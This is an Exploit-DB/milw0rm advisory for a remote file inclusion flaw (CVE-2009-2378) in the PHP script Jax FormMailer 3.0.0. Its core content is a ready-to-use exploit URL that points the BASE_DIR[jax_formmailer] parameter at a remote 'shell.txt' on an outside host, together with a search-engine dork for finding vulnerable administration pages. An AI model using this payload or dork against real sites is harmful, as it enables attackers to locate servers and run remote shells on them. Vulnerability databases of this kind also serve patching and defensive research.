jax formmailer 3.0.0 - Remote File Inclusion Vulnerability

2009-06-30T00:00:00
ID EDB-ID:9051
Type exploitdb
Reporter ahmadbady
Modified 2009-06-30T00:00:00

Description

Jax FormMailer 3.0.0 Remote File Inclusion Vulnerability. CVE-2009-2378. Webapps exploit for php platform

                                        
                                                                         --:remote file include:--
---------------------------------                  
script:Jax FormMailer 3.0.0
Release:01.06.2008
-
Author: ahmadbady
    
-----------------------------------------------------------------------
download from:http://www.jtr.de/scripting/php/formmailer/index_eng.html
   
-----------------------------------------------------------------------
dork:intitle:"Jax Formmailer - Administration"
-------------------------------------------
-------------------------------------------
xpl:

/path/modules/formmailer/formmailer.admin.inc.php?BASE_DIR[jax_formmailer]=http://site.com/shell.txt?

*******************************************

# milw0rm.com [2009-06-30]